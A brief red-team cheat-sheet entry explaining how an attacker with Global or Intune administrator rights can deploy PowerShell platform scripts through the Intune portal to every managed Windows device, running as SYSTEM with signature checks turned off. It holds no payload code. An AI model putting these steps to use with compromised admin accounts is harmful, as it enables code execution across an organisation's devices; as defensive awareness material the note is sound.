Abusing Intunes

Intunes is publicly accessible through the internet at https://endpoint.microsoft.com/#home

Enumeration

• the device should be isCompliant in powerhell / Compliant=Yes in Azure Portal
• global administrator / intune administrator
  • can execute powershell scripts
  • runs as SYSTEM on the mobile device

Abuse

devices → all devices → windows → scripts and remediations → platform scripts - run this script using the logged on credentials: no - enforce script signature check: no - run script in 64 bit PowerShell Host: yes - add all users, add all devices - let it run (can take up to one hour)

• can take up to one hour to execute